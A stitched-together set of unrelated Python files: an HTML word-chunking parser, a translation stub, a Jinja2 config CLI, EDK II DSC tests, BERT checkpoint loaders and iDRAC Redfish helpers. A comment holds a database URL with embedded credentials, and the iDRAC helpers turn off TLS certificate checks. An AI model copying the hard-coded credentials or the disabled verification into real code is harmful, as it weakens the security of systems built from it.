max_length=None, use_entity=False, classname=None):
"""Parses input HTML code into word chunks and organized code.
Args:
source: Text to be processed. (str)
attributes: A key-value mapping for attributes of output elements.
(dictionary, optional)
**This argument used to accept a string or a list of strings to
specify class names of the output chunks, but this designation method
is now deprecated. Please use a dictionary to designate attributes.**
use_cache: Whether to use caching. (bool, optional)
language: A language used to parse text. (str, optional)
max_length: Maximum length of span enclosed chunk. (int, optional)
use_entity: Whether to use entities Entity Analysis results. Note that it
makes additional request to API, which may incur additional cost.
(bool, optional)
classname: A class name of output elements. (str, optional)
**This argument is deprecated. Please use attributes argument
instead.**
Returns:
A dictionary with the list of word chunks and organized HTML code.
For example:
{
'chunks': [
{'dependency': None, 'label': 'NSUBJ', 'pos': 'NOUN', 'word': '今日も'},
{'dependency': None, 'label': 'ROOT', 'pos': 'VERB', 'word': '食べる'}
],
'html_code': '<span class="ww">今日も</span><span class="ww">食べる</span>'
}
"""
if use_cache:
result_value = cache.get(source, language)
if result_value: return result_value
input_text = self._preprocess(source)
if language == 'ko':
# Korean has spaces between words, so this simply parses words by space
# and wrap them as chunks.
chunks = self._get_chunks_per_space(input_text)
else:
chunks, tokens, language = self._get_chunks_with_api(
input_text, language, use_entity)
attributes = self._get_attribute_dict(attributes, classname)
html_code = self._html_serialize(chunks, attributes, max_length)
result_value = {
'chunks': [chunk.serialize() for chunk in chunks],
'html_code': html_code,
'language': language,
'tokens': tokens,
}
if use_cache:
cache.set(source, language, result_value)
return result_value
def _get_chunks_per_space(self, input_text):
"""Returns a chunk list by separating words by spaces.
Args:
input_text: String to parse. (str)
Returns:
A chunk list. (ChunkList)
"""
chunks = ChunkList()
words = input_text.split()
for i, word in enumerate(words):
chunks.append(Chunk(word))
if i < len(words) - 1: # Add no space after the last word.
chunks.append(Chunk.space())
return chunks
def _get_chunks_with_api(self, input_text, language=None, use_entity=False):
"""Returns a chunk list by using Google Cloud Natural Language API.
Args:
input_text: String to parse. (str)
language: A language code. 'ja' and 'ko' are supported. (str, optional)
use_entity: Whether to use entities in Natural Language API response.
(bool, optional)
Returns:
A chunk list. (ChunkList)
"""
chunks, tokens, language = self._get_source_chunks(input_text, language)
if use_entity:
entities = self._get_entities(input_text, language)
chunks = self._group_chunks_by_entities(chunks, entities)
chunks = self._resolve_dependency(chunks)
chunks = self._insert_breakline(chunks)
return chunks, tokens, language
def _get_attribute_dict(self, attributes, classname=None):
"""Returns a dictionary of HTML element attributes.
Args:
attributes: If a dictionary, it should be a map of name-value pairs for
attributes of output elements. If a string, it should be a class name of
output elements. (dict or str)
classname: Optional class name. (str, optional)
Returns:
An attribute dictionary. (dict of (str, str))
"""
if attributes and isinstance(attributes, six.string_types):
return {
'class': attributes
}
if not attributes:
attributes = {}
if not classname:
classname = self.DEFAULT_CLASS_NAME
attributes.setdefault('class', classname)
return attributes
def _preprocess(self, source):
"""Removes unnecessary break lines and white spaces.
Args:
source: HTML code to be processed. (str)
Returns:
Preprocessed HTML code. (str)
"""
doc = html5lib.parseFragment(source)
source = ET.tostring(doc, encoding='utf-8', method='text').decode('utf-8')
source = source.replace(u'\n', u'').strip()
source = re.sub(r'\s\s+', u' ', source)
return source
def _get_source_chunks(self, input_text, language=None):
"""Returns a chunk list retrieved from Syntax Analysis results.
Args:
input_text: Text to annotate. (str)
language: Language of the text. 'ja' and 'ko' are supported.
(str, optional)
Returns:
A chunk list. (ChunkList)
"""
chunks = ChunkList()
sentence_length = 0
tokens, language = self._get_annotations(input_text, language)
for i, token in enumerate(tokens):
word = token['text']['content']
begin_offset = token['text']['beginOffset']
label = token['dependencyEdge']['label']
pos = token['partOfSpeech']['tag']
if begin_offset > sentence_length:
chunks.append(Chunk.space())
sentence_length = begin_offset
chunk = Chunk(word, pos, label)
# Determining default concatenating direction based on syntax dependency.
chunk.maybe_add_dependency(
i < token['dependencyEdge']['headTokenIndex'])
chunks.append(chunk)
sentence_length += len(word)
return chunks, tokens, language
def _group_chunks_by_entities(self, chunks, entities):
"""Groups chunks by entities retrieved from NL API Entity Analysis.
Args:
chunks: The list of chunks to be processed. (ChunkList)
entities: List of entities. (list of dict)
Returns:
A chunk list. (ChunkList)
"""
for entity in entities:
chunks_to_concat = chunks.get_overlaps(
entity['beginOffset'], len(entity['content']))
if not chunks_to_concat: continue
new_chunk_word = u''.join([chunk.word for chunk in chunks_to_concat])
new_chunk = Chunk(new_chunk_word)
chunks.swap(chunks_to_concat, new_chunk)
return chunks
def _html_serialize(self, chunks, attributes, max_length):
"""Returns concatenated HTML code with SPAN tag.
Args:
chunks: The list of chunks to be processed. (ChunkList)
attributes: If a dictionary, it should be a map of name-value pairs for
attributes of output SPAN tags. If a string, it should be a class name
of output SPAN tags. If an array, it should be a list of class names
of output SPAN tags. (str or dict or list of str)
max_length: Maximum length of span enclosed chunk. (int, optional)
Returns:
The organized HTML code. (str)
"""
doc = ET.Element('span')
for chunk in chunks:
if chunk.is_space():
if doc.getchildren():
if doc.getchildren()[-1].tail is None:
doc.getchildren()[-1].tail = ' '
else:
doc.getchildren()[-1].tail += ' '
else:
if doc.text is not None:
# We want to preserve space in cases like "Hello 你好"
# But the space in " 你好" can be discarded.
doc.text += ' '
else:
if chunk.has_cjk() and not (max_length and len(chunk.word) > max_length):
ele = ET.Element('span')
ele.text = chunk.word
for k, v in attributes.items():
ele.attrib[k] = v
doc.append(ele)
else:
# add word without span tag for non-CJK text (e.g. English)
# by appending it after the last element
if doc.getchildren():
if doc.getchildren()[-1].tail is None:
doc.getchildren()[-1].tail = chunk.word
else:
doc.getchildren()[-1].tail += chunk.word
else:
if doc.text is None:
doc.text = chunk.word
else:
doc.text += chunk.word
result = ET.tostring(doc, encoding='utf-8').decode('utf-8')
result = html5lib.serialize(
html5lib.parseFragment(result), sanitize=True,
quote_attr_values="always")
return result
def _resolve_dependency(self, chunks):
"""Resolves chunk dependency by concatenating them.
Args:
chunks: a chink list. (ChunkList)
Returns:
A chunk list. (ChunkList)
"""
chunks = self._concatenate_inner(chunks, True)
chunks = self._concatenate_inner(chunks, False)
return chunks
def _concatenate_inner(self, chunks, direction):
"""Concatenates chunks based on each chunk's dependency.
Args:
direction: Direction of concatenation process. True for forward. (bool)
Returns:
A chunk list. (ChunkList)
"""
tmp_bucket = []
source_chunks = chunks if direction else chunks[::-1]
target_chunks = ChunkList()
for chunk in source_chunks:
if (
# if the chunk has matched dependency, do concatenation.
chunk.dependency == direction or
# if the chunk is SPACE, concatenate to the previous chunk.
(direction == False and chunk.is_space())
):
tmp_bucket.append(chunk)
continue
tmp_bucket.append(chunk)
if not direction: tmp_bucket = tmp_bucket[::-1]
new_word = ''.join([tmp_chunk.word for tmp_chunk in tmp_bucket])
chunk.update_word(new_word)
target_chunks.append(chunk)
tmp_bucket = []
if tmp_bucket: target_chunks += tmp_bucket
return target_chunks if direction else target_chunks[::-1]
def _insert_breakline(self, chunks):
"""Inserts a breakline instead of a trailing space if the chunk is in CJK.
Args:
chunks: a chunk list. (ChunkList)
Returns:
A chunk list. (ChunkList)
"""
target_chunks = ChunkList()
for chunk in chunks:
if chunk.word[-1] == ' ' and chunk.has_cjk():
chunk_to_add = Chunk(
chunk.word[:-1], chunk.pos, chunk.label, chunk.dependency)
target_chunks.append(chunk_to_add)
target_chunks.append(chunk.breakline())
else:
target_chunks.append(chunk)
return target_chunks
def _get_annotations(self, text, language='', encoding='UTF32'):
"""Returns the list of annotations from the given text."""
body = {
'document': {
'type': 'PLAIN_TEXT',
'content': text,
},
'features': {
'extract_syntax': True,
},
'encodingType': encoding,
}
if language:
body['document']['language'] = language
request = self.service.documents().annotateText(body=body)
response = request.execute()
tokens = response.get('tokens', [])
language = response.get('language')
return tokens, language
def _get_entities(self, text, language='', encoding='UTF32'):
"""Returns the list of annotations from the given text."""
body = {
'document': {
'type': 'PLAIN_TEXT',
'content': text,
},
'encodingType': encoding,
}
if language:
body['document']['language'] = language
request = self.service.documents().analyzeEntities(body=body)
response = request.execute()
result = []
for entity in response.get('entities', []):
mentions = entity.get('mentions', [])
if not mentions: continue
entity_text = mentions[0]['text']
offset = entity_text['beginOffset']
for word in entity_text['content'].split():
result.append({'content': word, 'beginOffset': offset})
offset += len(word)
return result
|
StarcoderdataPython
|
1788144
|
from googletrans import Translator
import couchdb
import os,json
import time
# couchdb_address = 'http://openwhisk:[email protected]:5984/'
# db = couchdb.Server(couchdb_address)
translator = Translator()
# def active_storage(avtive_type, user_object,document_id,filename,file_path=None,content_type=None, save_path=None):
# if avtive_type == 'PUT':
# content = open(file_path, 'rb')
# user_object.put_attachment(user_object[document_id], content.read(), filename = filename, content_type = content_type)
# content.close()
# elif avtive_type == 'GET':
# r = user_object.get_attachment(document_id,filename = filename)
# with open(save_path,'wb') as f: f.write(r.read())
# def get_fileNameExt(filename):
# (shortname, extension) = os.path.splitext(filename)
# return shortname, extension
def main():
extracted_text = store.fetch(['extracted_text'])['extracted_text']
# translated_text = translator.translate(extracted_text, dest='en').text # can't connect to google...
translated_text = extracted_text
time.sleep(1)
store.put({'translated_text': translated_text}, {})
# evt = json.loads(event)
# user_name = evt['user_name']
# document_id = evt['document_id']
# extracted_text_filename = evt['extracted_text_filename']
# user_object = db[user_name]
# input_path = os.path.join('..',user_name,document_id)
# input_filepath = os.path.join(input_path,extracted_text_filename)
# if os.path.exists(input_filepath):os.remove(input_filepath)
# else: os.makedirs(input_path)
# active_storage('GET', user_object,document_id,extracted_text_filename,save_path = input_filepath)
# shortname, extension = get_fileNameExt(extracted_text_filename)
# extract_text_path = os.path.join(input_path,'translated_{}.txt'.format(shortname))
# if os.path.exists(extract_text_path):os.remove(extract_text_path)
# with open(input_filepath,"r") as f:
# text_content = f.read()
# result = translator.translate(text_content, dest='en')
# with open(extract_text_path,'w', encoding='utf-8') as f:
# f.write(result.text)
# active_storage('PUT', user_object,document_id,extracted_text_filename,extract_text_path,'application/octet')
# main('{"user_name":"user_2","document_id":"object_id_1","extracted_text_filename":"extract_test.txt"}')
|
StarcoderdataPython
|
5167045
|
<filename>j2p.py
#!/usr/bin/env python3
__author__ = '<NAME>'
from modules.j2ASTwalker import J2Meta
from modules import tools, delivery
import sys
import yaml
import os
import argparse
class ArgParser:
def __init__(self, args=False): # arguments should be passed by unit test only
parser = argparse.ArgumentParser(description='\
Jinja2 Parser: YAML-builder and lightweight config generator.', epilog='Thank you for using help!')
parser.add_argument('filename', help='Filename.')
parser.add_argument('file_type', help='Jinja2 or YAML file.',
choices=['j2', 'yaml'])
subparsers = parser.add_subparsers(help='Select delivery mode, YAML only.', dest='mode')
save_parser = subparsers.add_parser('save', help='Save generated configs in a directory specified in settings.')
save_parser.add_argument('-p', '--prefix', help='Config filename prefix.', dest='prefix', default=False)
if args: # if arguments are passed from unittest
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
def prefix(self):
if self.args.mode == 'save':
return self.args.prefix
else:
return False
def mode(self):
return self.args.mode
def file_type(self):
return self.args.file_type
def filename(self):
return self.args.filename
class ScriptEnvironment:
def __init__(self, cli_args, settings_file='./settings.yaml'):
self.script_realpath = os.path.realpath(__file__)
self.script_dirname = os.path.dirname(self.script_realpath)
try:
# load parameters from settings file
settings = tools.load_yaml(os.path.realpath(settings_file))
self.template_path = self.get_dir(settings['template_path'])
self.configs_path = self.get_dir(settings['configs'])
self.task_path = self.get_dir(settings['task_path'])
db_name = self.get_file(self.script_realpath, settings['host_db'])
self.json_db = tools.load_yaml(db_name)
if not isinstance(self.json_db, dict):
sys.exit('ERROR: Wrong db format. Database file should be a dictionary!')
# get parameters from CLI
self.file_type = cli_args.file_type()
if self.file_type == "yaml":
self.filename = self.get_file(self.task_path, cli_args.filename())
self.json_data = tools.load_yaml(self.filename)
self.mode = cli_args.mode()
if self.mode == 'save':
self.prefix = cli_args.prefix()
else:
self.filename = self.get_file(self.template_path, cli_args.filename())
except Exception as _:
sys.exit('ERROR: Can not load settings!')
def get_dir(self, dir_name):
if os.path.isdir(dir_name):
return dir_name
else:
template_dir = os.path.join(self.script_realpath, dir_name)
if os.path.isdir(template_dir):
return template_dir
else:
sys.exit('ERROR: Can not find directory %s!' % dir_name)
def get_file(self, dir, file_name):
if os.path.isfile(file_name):
return file_name
else:
file = os.path.join(dir, file_name)
if os.path.isfile(file):
return file
else:
sys.exit('ERROR: Can not find file %s!' % file_name)
if __name__ == '__main__':
# define script environment
cli_args = ArgParser()
env = ScriptEnvironment(cli_args)
# delivery.run(env)
if env.file_type == 'j2':
template_meta = J2Meta(env.filename)
print(
yaml.dump(template_meta.get_variables(), default_flow_style=False)
)
if env.file_type == 'yaml':
if env.mode == 'save':
delivery.save_configs(env)
|
StarcoderdataPython
|
11362527
|
# @file dsc_test.py
# Tests for the data model for the EDK II DSC
#
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import unittest
from edk2toollib.uefi.edk2.build_objects.dsc import dsc
from edk2toollib.uefi.edk2.build_objects.dsc import library_class
from edk2toollib.uefi.edk2.build_objects.dsc import component
from edk2toollib.uefi.edk2.build_objects.dsc import definition
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_buildoption_section_type
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_pcd_section_type
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_section_type
class TestDscObject(unittest.TestCase):
def test_null_creation(self):
d = dsc()
self.assertNotEqual(d, None)
def test_dsc_multple_defines(self):
# When we add an object, it should overwrite the previous one
d = TestDscObject.create_dsc_object()
d.defines.add(definition("PLATFORM_NAME", "TEST2"))
for define in d.defines:
if define.name == "PLATFORM_NAME": # check to make sure it matches
self.assertEqual(define.value, "TEST2")
def test_dsc_multple_library_classes(self):
d = dsc()
# When we add an object, it should overwrite the previous one
common_section = dsc_section_type()
d.library_classes[common_section].add(library_class("TEST", "BOB.inf"))
self.assertEqual(len(d.library_classes[common_section]), 1)
# we should override the previous one
d.library_classes[common_section].add(library_class("TEST", "BOB2.inf"))
self.assertEqual(len(d.library_classes[common_section]), 1)
for lib in d.library_classes[common_section]:
self.assertEqual(lib.inf, "BOB2.inf") # make sure we overrode it
self.assertEqual(len(d.library_classes[common_section]), 1)
# make sure we can add a library to a different section and that
IA32_section = dsc_section_type(arch="IA32")
self.assertEqual(len(d.library_classes[IA32_section]), 0)
d.library_classes[IA32_section].add(library_class("NULL", "BOB1.inf"))
self.assertEqual(len(d.library_classes[IA32_section]), 1)
d.library_classes[IA32_section].add(library_class("NULL", "BOB2.inf"))
self.assertEqual(len(d.library_classes[IA32_section]), 2)
def test_get_library_classes(self):
''' This serves more as an example of how to walk the DSC to get a library class for a componenet '''
pass
def test_put_in_bad_things(self):
d = dsc()
# make sure we can't add stuff to d.defines
with self.assertRaises(ValueError):
d.defines.add(library_class("NULL", "TEST.inf"))
# make sure we can't add stuff to skus
with self.assertRaises(ValueError):
d.skus.add(library_class("TEST", "TEST.inf"))
# make sure we can't add stuff to skus
with self.assertRaises(ValueError):
d.default_stores.add(component("TEST", "TEST.inf"))
common_section = dsc_section_type()
build_opt_section = dsc_buildoption_section_type()
pcd_section = dsc_pcd_section_type("FEATUREFLAG")
# now to check the build options
d.build_options[build_opt_section] = set()
with self.assertRaises(ValueError):
d.build_options[pcd_section] = set()
with self.assertRaises(ValueError):
d.build_options[common_section] = set()
with self.assertRaises(ValueError):
d.build_options[build_opt_section].add(library_class("TEST", "TEST.inf"))
# NEXTVER: once the adding logic is implemented, this will be need to redone
with self.assertRaises(ValueError):
d.build_options[build_opt_section] = set()
# now to check the pcds
d.pcds[pcd_section] = set()
with self.assertRaises(ValueError):
d.pcds[build_opt_section] = set()
with self.assertRaises(ValueError):
d.pcds[pcd_section].add(library_class("TEST", "TEST.inf"))
# NEXTVER: once the adding logic is implemented, this will be need to redone
with self.assertRaises(ValueError):
d.pcds[pcd_section] = set()
# now to check the library classes
d.library_classes[common_section] = set()
with self.assertRaises(ValueError):
d.library_classes[build_opt_section] = set()
with self.assertRaises(ValueError):
d.library_classes[common_section].add(component("TEST.inf"))
# NEXTVER: once the adding logic is implemented, this will be need to redone
with self.assertRaises(ValueError):
d.library_classes[common_section] = set()
# now to check the components
d.components[common_section] = set()
with self.assertRaises(ValueError):
d.components[build_opt_section] = set()
with self.assertRaises(ValueError):
d.components[common_section].add(library_class("TEST", "TEST.inf"))
# NEXTVER: once the adding logic is implemented, this will be need to redone
with self.assertRaises(ValueError):
d.components[common_section] = set()
@staticmethod
def create_dsc_object():
# Normally we would just read the dsc object
d = dsc()
# first add the defines
d.defines.add(definition("PLATFORM_NAME", "TEST"))
d.defines.add(definition("PLATFORM_GUID", "EB216561-961F-47EE-9EF9-CA426EF547C2"))
d.defines.add(definition("OUTPUT_DIRECTORY", "Build/TEST"))
d.defines.add(definition("SUPPORTED_ARCHITECTURES", "IA32 X64 AARCH64"))
# Next add some library classes
default_section = dsc_section_type()
d.library_classes[default_section].add(library_class("NULL", "BOB.inf"))
# Next add a component
return d
|
StarcoderdataPython
|
9756049
|
from tensorflow.python.training import py_checkpoint_reader
import tensorflow as tf
##reload the model weights from checkpoints since the model structure is changed due to modified code in /official
def load_tf2_weights_emb(tf2_checkpoint, embedding_model):
reader = tf.train.load_checkpoint(tf2_checkpoint)
embedding_model.set_weights([
reader.get_tensor(
'model/bert/embeddings/weight/.ATTRIBUTES/VARIABLE_VALUE')
])
return embedding_model
def load_tf1_weights_emb(tf1_checkpoint, embedding_model):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
embedding_model.set_weights(
[reader.get_tensor('bert/embeddings/word_embeddings')])
return embedding_model
def load_tf2_weights_cls(tf2_checkpoint, decoder_model):
reader = tf.train.load_checkpoint(tf2_checkpoint)
tf2_cls_name_lst = [
'model/classifier/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/classifier/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
decoder_model.layers[-1].set_weights(
[reader.get_tensor(n) for n in tf2_cls_name_lst])
def load_tf1_weights_cls(tf1_checkpoint, decoder_model):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
tf2_cls_name_dict = {}
tf2_cls_name_dict[-1] = [
'cls/predictions/transform/dense/kernel',
'cls/predictions/transform/dense/bias',
'cls/predictions/transform/LayerNorm/gamma',
'cls/predictions/transform/LayerNorm/beta',
'cls/predictions/output_bias'
]
decoder_model.layers[-1].set_weights(
[reader.get_tensor(n) for n in tf2_cls_name_dict[-1]])
def load_tf2_weights_core(tf2_checkpoint, core_model, num_layer):
reader = tf.train.load_checkpoint(tf2_checkpoint)
layer_name_lst = [(i, e.name) for i, e in enumerate(core_model.layers)]
tf2_core_name_dict = {}
def locate_index(substring, exclude=None):
for i, e in layer_name_lst:
if exclude:
flag = substring in e and exclude not in e
else:
flag = substring in e
if flag:
# print(substring, e)
return i
# tf2_core_name_dict[1] = ['bert/embeddings/word_embeddings']
tf2_core_name_dict[locate_index('position_embedding')] = [
'model/bert/embeddings/embeddings/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('type_embeddings')] = [
'model/bert/embeddings/token_type_embeddings/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('embeddings/layer_norm')] = [
'model/bert/embeddings/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/embeddings/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
attn = [
'model/bert/encoder/layer/{}/attention/self_attention/query/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/query/bias/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/key/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/key/bias/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/value/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/value/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
attn_output = [
'model/bert/encoder/layer/{}/attention/dense_output/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/dense_output/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
attn_output_norm = [
'model/bert/encoder/layer/{}/attention/dense_output/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/dense_output/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
inte = [
'model/bert/encoder/layer/{}/intermediate/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/intermediate/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
output = [
'model/bert/encoder/layer/{}/bert_output/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/bert_output/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
output_norm = [
'model/bert/encoder/layer/{}/bert_output/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/bert_output/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('pooler_transform')] = [
'model/bert/pooler/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/pooler/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
for l in range(num_layer):
tf2_core_name_dict[locate_index(
'self_attention_{}'.format(l))] = [s.format(l) for s in attn]
tf2_core_name_dict[locate_index(
'self_attention_output_{}'.format(l))] = [
s.format(l) for s in attn_output
]
tf2_core_name_dict[locate_index(
'self_attention_layer_norm_{}'.format(l))] = [
s.format(l) for s in attn_output_norm
]
tf2_core_name_dict[locate_index(
'intermediate_{}'.format(l))] = [s.format(l) for s in inte]
tf2_core_name_dict[locate_index('output_{}'.format(l), 'attention')] = [
s.format(l) for s in output
]
tf2_core_name_dict[locate_index('output_layer_norm_{}'.format(l))] = [
s.format(l) for s in output_norm
]
for a in tf2_core_name_dict:
weight_shapes = [w.shape for w in core_model.layers[a].weights]
core_model.layers[a].set_weights([
reader.get_tensor(n).reshape(s)
for (n, s) in zip(tf2_core_name_dict[a], weight_shapes)
])
def load_tf1_weights_core(tf1_checkpoint, core_model, num_layer):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
layer_name_lst = [(i, e.name) for i, e in enumerate(core_model.layers)]
def locate_index(substring, exclude=None):
for i, e in layer_name_lst:
if exclude:
flag = substring in e and exclude not in e
else:
flag = substring in e
if flag:
return i
tf2_core_name_dict = {}
tf2_core_name_dict[locate_index('position_embedding')] = [
'bert/embeddings/position_embeddings'
]
tf2_core_name_dict[locate_index('type_embeddings')] = [
'bert/embeddings/token_type_embeddings'
]
tf2_core_name_dict[locate_index('embeddings/layer_norm')] = [
'bert/embeddings/LayerNorm/gamma', 'bert/embeddings/LayerNorm/beta'
]
attn = [
'bert/encoder/layer_{}/attention/self/query/kernel',
'bert/encoder/layer_{}/attention/self/query/bias',
'bert/encoder/layer_{}/attention/self/key/kernel',
'bert/encoder/layer_{}/attention/self/key/bias',
'bert/encoder/layer_{}/attention/self/value/kernel',
'bert/encoder/layer_{}/attention/self/value/bias'
]
attn_output = [
'bert/encoder/layer_{}/attention/output/dense/kernel',
'bert/encoder/layer_{}/attention/output/dense/bias'
]
attn_output_norm = [
'bert/encoder/layer_{}/attention/output/LayerNorm/gamma',
'bert/encoder/layer_{}/attention/output/LayerNorm/beta'
]
inte = [
'bert/encoder/layer_{}/intermediate/dense/kernel',
'bert/encoder/layer_{}/intermediate/dense/bias'
]
output = [
'bert/encoder/layer_{}/output/dense/kernel',
'bert/encoder/layer_{}/output/dense/bias'
]
output_norm = [
'bert/encoder/layer_{}/output/LayerNorm/gamma',
'bert/encoder/layer_{}/output/LayerNorm/beta'
]
for l in range(num_layer):
tf2_core_name_dict[locate_index(
'self_attention_{}'.format(l))] = [s.format(l) for s in attn]
tf2_core_name_dict[locate_index(
'self_attention_output_{}'.format(l))] = [
s.format(l) for s in attn_output
]
tf2_core_name_dict[locate_index(
'self_attention_layer_norm_{}'.format(l))] = [
s.format(l) for s in attn_output_norm
]
tf2_core_name_dict[locate_index(
'intermediate_{}'.format(l))] = [s.format(l) for s in inte]
tf2_core_name_dict[locate_index('output_{}'.format(l), 'attention')] = [
s.format(l) for s in output
]
tf2_core_name_dict[locate_index('output_layer_norm_{}'.format(l))] = [
s.format(l) for s in output_norm
]
for a in tf2_core_name_dict:
weight_shapes = [w.shape for w in core_model.layers[a].weights]
core_model.layers[a].set_weights([
reader.get_tensor(n).reshape(s)
for (n, s) in zip(tf2_core_name_dict[a], weight_shapes)
])
|
StarcoderdataPython
|
5081994
|
import ipaddress
import getpass
import json
import logging
import os
import re
import requests
import sys
import time
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib3.exceptions import InsecureRequestWarning
def create_dir(directory):
"""
create directory recursively
"""
try:
os.makedirs(directory)
logging.info('successfully created directory {}'.format(directory))
except OSError:
logging.error('creating directory {} failed'.format(directory))
def check_path(path, isfile=False, isdir=False):
"""
returns if path given is a file or directory
"""
return os.path.isfile(path) if isfile else os.path.isdir(path)
def set_values(user_input, default, check=''):
"""
sets default value if user input is empty value.
ensures integer value if necessary
"""
if check == 'integer' and user_input != '':
user_input = check_user_input_if_integer(user_input)
return default if not user_input else user_input
def validate_url(url):
"""
validates url and checks if any HTTP Errors
"""
url_verify = ''
try:
url_verify = urlopen(url)
except HTTPError:
logging.error('URL {} - HTTP Error'.format(url))
return url_verify
def check_user_input_if_integer(user_input):
"""
check if user input is integer and not any other data type
"""
integer_input = ''
while not integer_input:
try:
integer_input = int(user_input)
except ValueError:
logging.warn('only integer number accepted')
user_input = input('enter a number: ')
return integer_input
def get_ip(node_name='', ip_type=''):
"""
get the ip address of a node
"""
ip = ''
while True:
ip = input('ip address for {} in {} node: '.format(ip_type, node_name))
ip_check = validate_ip(ip)
if ip_check:
break
else:
logging.warn('ip address should be in format: x.x.x.x')
return ip
def validate_ip(ip):
"""
validates ip address format
"""
valid_ip = ''
try:
valid_ip = ipaddress.ip_address(ip)
except ValueError:
logging.error('ip address \'{}\' is not valid: '.format(ip))
return valid_ip
def validate_port(port):
"""
validate ports to ensure HAProxy ports are not reused
"""
invalid_ports = [80, 443, 6443, 22623]
while True:
try:
check_for_string = port.isdigit()
if not check_for_string:
logging.warn('port has to be an integer')
else:
invalid_ports.index(int(port))
logging.warn('ports {} are not allowed'.format(invalid_ports))
port = input('enter a port: ')
except AttributeError:
break
except ValueError:
break
return port
def validate_network_cidr(network_cidr):
"""
validate ip address with cidr format. defaults to /24 if only IP is given
"""
compressed_network_cidr = ''
while True:
try:
compressed_network_cidr = ipaddress.ip_network(network_cidr)
break
except ValueError:
logging.warn('input should be in format x.x.x.x/x')
network_cidr = input('enter the network cidr: ')
return compressed_network_cidr.compressed
def validate_cidr(cidr):
"""
validates subnet in cidr format.
"""
check_integer = ''
while not check_integer:
check_integer = check_user_input_if_integer(cidr)
if check_integer and check_integer < 32:
pass
else:
cidr = input('user input has to be an integer and less than 32: ')
return cidr
def connect_to_idrac(user, passwd, base_api_url):
"""
establishes connection to idrac
"""
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
response = ''
try:
response = requests.get(base_api_url, verify=False, auth=(user, passwd),
timeout=5)
except requests.exceptions.ConnectTimeout:
logging.error('failed to establish connection to base api url')
except Exception as e:
logging.error('unknown exception occurred')
logging.error('{}'.format(e))
return response
def get_network_devices(user, passwd, base_api_url):
"""
get list of network devices from iDRAC
"""
network_devices = ''
response = connect_to_idrac(user, passwd, base_api_url)
if response and response.json():
network_devices_info = response.json()
try:
network_devices = network_devices_info[u'Members']
except KeyError:
network_devices = ''
return network_devices
def generate_network_devices_menu(devices):
"""
generate a list of network devices menu obtained from iDRAC
"""
menu = {}
i = 1
choice = ''
devices.sort()
for device in devices:
menu[i] = device
i += 1
while True:
options = menu.keys()
for entry in options:
logging.info('{} -> {}'.format(entry, menu[entry]))
choice = input('Select the interface used by DHCP: ')
if choice == '1' or choice == '2' or choice == '3' or choice == '4':
break
else:
logging.warn('unknown option selected')
selected_network_device = menu[int(choice)]
logging.info('selected interface is: {}'.format(menu[int(choice)]))
return selected_network_device
def get_mac_address(selected_network_device, base_api_url, user, passwd):
"""
get mac address for a selected network device
"""
url = '{}/{}'.format(base_api_url, selected_network_device)
device_mac_address = ''
try:
response = requests.get(url, verify=False, auth=(user, passwd),
timeout=5)
except requests.exceptions.ConnectionTimeout:
logging.error('failed to establish connection to get mac address')
try:
network_device_info = response.json()
except ValueError:
logging.error('check URL, iDRAC user and password may be invalid')
logging.info('{}'.format(url))
try:
device_mac_address = network_device_info[u'MACAddress']
except KeyError:
logging.error('No MAC Address found for network devices')
logging.info('{}'.format(selected_network_device))
return device_mac_address
def get_network_device_mac(node_name='', ip_type=''):
"""
lists available network devices from iDRAC
generates a menu of network devices
obtains mac address for the network device
"""
devices = []
network_device_mac_address = ''
ip = get_ip(node_name=node_name, ip_type=ip_type)
user = input('enter the idrac user for {}: '.format(node_name))
passwd = getpass.getpass('enter idrac password for {}: '.format(node_name))
base_api_url = 'https://{}/redfish/v1/Systems/System.Embedded.1/EthernetInterfaces'.format(ip)
network_devices = get_network_devices(user, passwd, base_api_url)
if network_devices:
for network_device in network_devices:
device = list(map(lambda interface: interface.encode('ascii'), network_device.values()))
try:
devices.append(device[0].decode("utf-8").split('/')[-1])
except IndexError:
logging.error('Did not find any network devices')
if devices:
selected_network_device = generate_network_devices_menu(devices)
network_device_mac_address = get_mac_address(selected_network_device, base_api_url, user, passwd)
